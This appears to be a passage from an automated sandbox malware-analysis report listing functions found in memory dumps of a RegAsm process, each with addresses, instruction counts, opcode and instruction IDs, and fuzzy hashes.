                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 071eb8abe4b7a65d8caaf5a4190bda50ee7b71c4106d9e6c18d42b538111443c
                                                                                • Instruction ID: 34421c99f27d4e0cfe47631123f2c0fdc9261f2a3dd52f90730ae58f8b91e74c
                                                                                • Opcode Fuzzy Hash: 071eb8abe4b7a65d8caaf5a4190bda50ee7b71c4106d9e6c18d42b538111443c
                                                                                • Instruction Fuzzy Hash: 19212571508204EFDB04DF54DDC0B26BB61EB84318F20C56DD8095B292CB36D886CB61
                                                                                Function 00E0D47C Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3683935927.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_e0d000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 50d63a3aac9c6f037bf882ebb6e3991a863d2c95299c6e4f90ea5b22bf7d9ef4
                                                                                • Instruction ID: 494c7aca7378d3a842c6ba49a5df4182e52ced93201d724d1d9bbbc80e1b8840
                                                                                • Opcode Fuzzy Hash: 50d63a3aac9c6f037bf882ebb6e3991a863d2c95299c6e4f90ea5b22bf7d9ef4
                                                                                • Instruction Fuzzy Hash: 3921F275508204EFDB14DF94DDC0B26BB61EB8431CF24C5ADEC095B296C336D886CB62
                                                                                Function 00E0D2CC Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3683935927.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_e0d000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4b01a2c3641097caafef8e7f962ceca1b51226e9c10b3c0b29e91d0b737b868f
                                                                                • Instruction ID: b57403a14492163fb1a66405a4728522856c66dd745fa8c6afdcc8e8cbae28cd
                                                                                • Opcode Fuzzy Hash: 4b01a2c3641097caafef8e7f962ceca1b51226e9c10b3c0b29e91d0b737b868f
                                                                                • Instruction Fuzzy Hash: 7C2129B5508344EFDB14DF54DDC0B26FB65FB84328F24C969D8095B281C339D886CB62
                                                                                Function 069161A0 Relevance: .1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3994e83dab75c3407bca93a2c5a55ec63343a166a56d6ca8ab0f31a5be9afe37
                                                                                • Instruction ID: fc504cfe41154dcc4649d0cd4bace49ca6514935616f7c570cb3a35c8a6d90a1
                                                                                • Opcode Fuzzy Hash: 3994e83dab75c3407bca93a2c5a55ec63343a166a56d6ca8ab0f31a5be9afe37
                                                                                • Instruction Fuzzy Hash: 1B21B071A00119CFCB54DF98C980E99FBB2FF85301B6288A5D455AFA92C330FC02CBA0
                                                                                Function 06916A39 Relevance: .1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aa58a32349bd178ce210f9d94c9c5dff7d169d52650847dd978db6d4dc31239c
                                                                                • Instruction ID: 8301fe7fd9365876fc1a0f59978a0b90ff083b9dc795a5b0d9599f8b6cfe465b
                                                                                • Opcode Fuzzy Hash: aa58a32349bd178ce210f9d94c9c5dff7d169d52650847dd978db6d4dc31239c
                                                                                • Instruction Fuzzy Hash: CD110A746053459FDF46FF34E844A9D7B62DF85204B11876AD1008F786DF78AA0B8BE2
                                                                                Function 069134F0 Relevance: .1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f356401e676189adbd1e088cd0c34ab413c48e5b89c9d0195b002ddf5fe4a290
                                                                                • Instruction ID: fe2b9a3197fee4a73a3aa17543dd56f881dd7fa48503231b53ce3c750aedc4df
                                                                                • Opcode Fuzzy Hash: f356401e676189adbd1e088cd0c34ab413c48e5b89c9d0195b002ddf5fe4a290
                                                                                • Instruction Fuzzy Hash: 5C11FA763002149FCB04DF59E888C5ABB7AEF88721B248156FA058B365CB32DC11DBA0
                                                                                Function 00E0D0F7 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3683935927.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_e0d000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                • Instruction ID: a9a0e4eb3c27b861c729a2f5004ba5ebcf8aa90ef88fc1efede13dae63f2627f
                                                                                • Opcode Fuzzy Hash: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                • Instruction Fuzzy Hash: 8911BE75508284DFDB05CF50D9C4B15FB61FB44318F24C6A9D8494B696C33AD88ACB51
                                                                                Function 00E0D477 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3683935927.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_e0d000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                • Instruction ID: 7c86be7053223b8ae9a53e6aabd0e3fdfb79e77b1026881d8ca29d5589b94355
                                                                                • Opcode Fuzzy Hash: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                • Instruction Fuzzy Hash: 92118E75508280DFDB15CF54D9C4B15BB61FB84318F24C6A9DC494B696C33AD84ACF52
                                                                                Function 00E0D2C7 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3683935927.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_e0d000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e173d83260521b16678ca7d2b1e0f986cdc6a2ea89473de2067ebc38b1b599b3
                                                                                • Instruction ID: 30afc689e77214ec60d21bba4577fb08271158b392b4c0cd6e962dcaccc70547
                                                                                • Opcode Fuzzy Hash: e173d83260521b16678ca7d2b1e0f986cdc6a2ea89473de2067ebc38b1b599b3
                                                                                • Instruction Fuzzy Hash: CE11C476508680DFDB11CF10D9C4B19FF71FB84328F24C6A9D8495B686C33AD846CB52
                                                                                Function 06916A48 Relevance: .1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0ce065d67cdb46f066a29d294851548c388687ab8b6105ebb0f23330b6ad15c4
                                                                                • Instruction ID: a79bfc3b3774b63e4fafc2ad11ec6cea38ac7473cd566e4f7886beda3b0a2571
                                                                                • Opcode Fuzzy Hash: 0ce065d67cdb46f066a29d294851548c388687ab8b6105ebb0f23330b6ad15c4
                                                                                • Instruction Fuzzy Hash: 281108707013499BDF55FF34E844A9D7B62DFC5210B11862AD1004F386EF79AA078BE1
                                                                                Function 0691698E Relevance: .1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 19b3fc524d7310503d5f0fec429d1cf48ae4cdc20bc028904da8070d229f266f
                                                                                • Instruction ID: 946e1da6e198a647ad97d80a3630e8d8190df3fc3a6c6d9317fcab7cf33b4d3e
                                                                                • Opcode Fuzzy Hash: 19b3fc524d7310503d5f0fec429d1cf48ae4cdc20bc028904da8070d229f266f
                                                                                • Instruction Fuzzy Hash: 4B11E275E482499FE710CF11D8A9B5DBBB0EF41724F34009AD5419FAA6C7759801CF80
                                                                                Function 06914799 Relevance: .0, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cec696fa48e48375615500842d161395bb6b8cc94291d0a437641473750ef9df
                                                                                • Instruction ID: 9caf54ce3173e807c68e6157381533e449eeed97ea3b36902de07d9f9926b9bb
                                                                                • Opcode Fuzzy Hash: cec696fa48e48375615500842d161395bb6b8cc94291d0a437641473750ef9df
                                                                                • Instruction Fuzzy Hash: FB01EC76704218AF8701DF59EC85C9EBBFEFF89250714446AF549CB251DA309A058BA1
                                                                                Function 06915B18 Relevance: .0, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 029f2713c0453d9c66cc78546a86d982e242c0ace0fdad65986ebc2224a7ba7e
                                                                                • Instruction ID: 195b7ce051fa6ca58c571648bdc8299483d4b037ff9950bf5411780b7334644c
                                                                                • Opcode Fuzzy Hash: 029f2713c0453d9c66cc78546a86d982e242c0ace0fdad65986ebc2224a7ba7e
                                                                                • Instruction Fuzzy Hash: E7016D2150A3A04FD353EBBC9860AD67FB69F8311071B44D7E485CF1A3DA248D59C7E6
                                                                                Function 06914CA0 Relevance: .0, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 28dbd9da489fd041c9ba264d1dc9595f9513a7c9eb903b9358be5ac316bd6fcb
                                                                                • Instruction ID: e76aea98e6ad870bbe96859af1b61b30bf5afe842b7f251597e8e6c4ac8f6562
                                                                                • Opcode Fuzzy Hash: 28dbd9da489fd041c9ba264d1dc9595f9513a7c9eb903b9358be5ac316bd6fcb
                                                                                • Instruction Fuzzy Hash: 07F022B16012A45FD3228B19DC80CA7BFFEEFC4310B18812BE982CB942C2349806C7B0
                                                                                Function 06912DF7 Relevance: .0, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 283566b00bdec1c0bf530ec30978aafddd653faa2840e092343a5e31309803e7
                                                                                • Instruction ID: 2ce49ccf19b63a1bac014443dfc377b90d847973f6b872bc89345c37a335c1a0
                                                                                • Opcode Fuzzy Hash: 283566b00bdec1c0bf530ec30978aafddd653faa2840e092343a5e31309803e7
                                                                                • Instruction Fuzzy Hash: 77012834D0130ADFCB54DFA9D844AEABBF5FF48310B60892DD569AB610D730AA46CF90
                                                                                Function 0691842E Relevance: .0, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ab6ea1c8a167620ba97d867629c8165e4e28190884a62aaaae89b53c1080c59d
                                                                                • Instruction ID: 76dc50a9578a8bac56bbc400ff7d446c076faf4fc750f06845d63cfc727a48bb
                                                                                • Opcode Fuzzy Hash: ab6ea1c8a167620ba97d867629c8165e4e28190884a62aaaae89b53c1080c59d
                                                                                • Instruction Fuzzy Hash: F7F06D31E00228ABDB14CA99E8509DEBBB9EB89220F04412AE940A7654DB715956CBE1
                                                                                Function 06912E08 Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d953dd05ee9a18a65173b629dab235dd46a98aba0451d41681b2f8a11e63d52f
                                                                                • Instruction ID: fa26aef2dceaf1a36b0ab86e06c15e2101faf789e4b6a3c7e50408d6c5a6c56f
                                                                                • Opcode Fuzzy Hash: d953dd05ee9a18a65173b629dab235dd46a98aba0451d41681b2f8a11e63d52f
                                                                                • Instruction Fuzzy Hash: 84F03730D0030ACFCB54DFA9D8406AEB7F1FF48310F208929D519AB610D331AA42CF80
                                                                                Function 069145D8 Relevance: .0, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4778c10e58fc27403f8381e5a9dbb70314572ee128b46f964a5bca3becebbd95
                                                                                • Instruction ID: e197ff3cd4ac6745f6e08cffe855da4153a7cb3f3079b480eb3ffab6568812f5
                                                                                • Opcode Fuzzy Hash: 4778c10e58fc27403f8381e5a9dbb70314572ee128b46f964a5bca3becebbd95
                                                                                • Instruction Fuzzy Hash: 52E0D8213093541BC751AA6E9C8096BBFDEDFCA560B9644BFE248CB383CD615C0A83F5
                                                                                Function 069145E8 Relevance: .0, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 77b0af3da91f93d0041a754f579cf689eafbbe984ed308f60307a93ffa70cf0a
                                                                                • Instruction ID: 9c169cbdf702d04a30e436fdcdde41bd7582905c95f8e26d6249b5011e87d6ed
                                                                                • Opcode Fuzzy Hash: 77b0af3da91f93d0041a754f579cf689eafbbe984ed308f60307a93ffa70cf0a
                                                                                • Instruction Fuzzy Hash: 7DD05E62301224178694769F688092FA6CEDFCE9A1B95443EE31DD7781CD729C0643F5

                                                                                Non-executed Functions

                                                                                Function 06917460 Relevance: 2.3, Strings: 1, Instructions: 1021COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: xX@s<h
                                                                                • API String ID: 0-4035273746
                                                                                • Opcode ID: 4c4ba8184f13a13563ee1e305b6f78d82f2e905cb5e5ad1c2bdcc38b96ddc709
                                                                                • Instruction ID: fcd17320ac7b14d1e880730d849715545950e3b18c4d5d00d164bac80fa46c25
                                                                                • Opcode Fuzzy Hash: 4c4ba8184f13a13563ee1e305b6f78d82f2e905cb5e5ad1c2bdcc38b96ddc709
                                                                                • Instruction Fuzzy Hash: 48826E30B002098FEB54DF79C994B6EB6E2EF84300F658429E1069F7A6DF75DD068B91
                                                                                Function 06910040 Relevance: 1.7, Strings: 1, Instructions: 451COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: \;q
                                                                                • API String ID: 0-705206692
                                                                                • Opcode ID: e3addff34d70538eee7afe252fed0f83db3d2e944e16a7d6e5eea2a9552a7e43
                                                                                • Instruction ID: 1728e03ab40f4272ac585ba350fd6e1250225cd7f3044b2d1e8c23c90afbfa36
                                                                                • Opcode Fuzzy Hash: e3addff34d70538eee7afe252fed0f83db3d2e944e16a7d6e5eea2a9552a7e43
                                                                                • Instruction Fuzzy Hash: 3A222730D1071ACFEB60DF64C844B99B7B2BF95300F218699D9097B251EB75AAC9CF90
                                                                                Function 06910006 Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: \;q
                                                                                • API String ID: 0-705206692
                                                                                • Opcode ID: 0ee3e4ac2cc1bf52062dc563a7ebb2be7b87facf82908bf712b34e3b4e0bfdd4
                                                                                • Instruction ID: 855b50959190749280672f0e44c5591f5f8efa55fc365be167e4c71fa2d4335e
                                                                                • Opcode Fuzzy Hash: 0ee3e4ac2cc1bf52062dc563a7ebb2be7b87facf82908bf712b34e3b4e0bfdd4
                                                                                • Instruction Fuzzy Hash: E0E16C30D1031ACFEB55DF64C844AADB7B6BF85300F2186AAD405AF251EB75A9C9CB90
                                                                                Function 02A62F19 Relevance: .3, Instructions: 316COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3687608682.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2a60000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e2fde17dc6d7042e01c75269a07998a4c2dfd4adb6889604a3bcb9d9e2277e90
                                                                                • Instruction ID: 4f628d9a7f8086128f62fc6ee6135ee494ebdf7729a44e4e3ab50cc337049510
                                                                                • Opcode Fuzzy Hash: e2fde17dc6d7042e01c75269a07998a4c2dfd4adb6889604a3bcb9d9e2277e90
                                                                                • Instruction Fuzzy Hash: F8916B72F0031547EF08CAB98DD43BEA1A36BD4A15F8E817ADA46CB789EF74D9064340
                                                                                Function 02A62792 Relevance: .3, Instructions: 313COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3687608682.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2a60000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: db12b1d3330fb573d62523a7671510f9a184b9f98bbc430f3dc8b5d977028a6a
                                                                                • Instruction ID: d92b31c0bd4b992a56ce2abb02d551330f0be7c1ab2650c3368b9a93be5d23c1
                                                                                • Opcode Fuzzy Hash: db12b1d3330fb573d62523a7671510f9a184b9f98bbc430f3dc8b5d977028a6a
                                                                                • Instruction Fuzzy Hash: 8B914B32F0031647EB58CABD8DD43BEA1A39BC4215F5D81399E46DF789EF74E9029281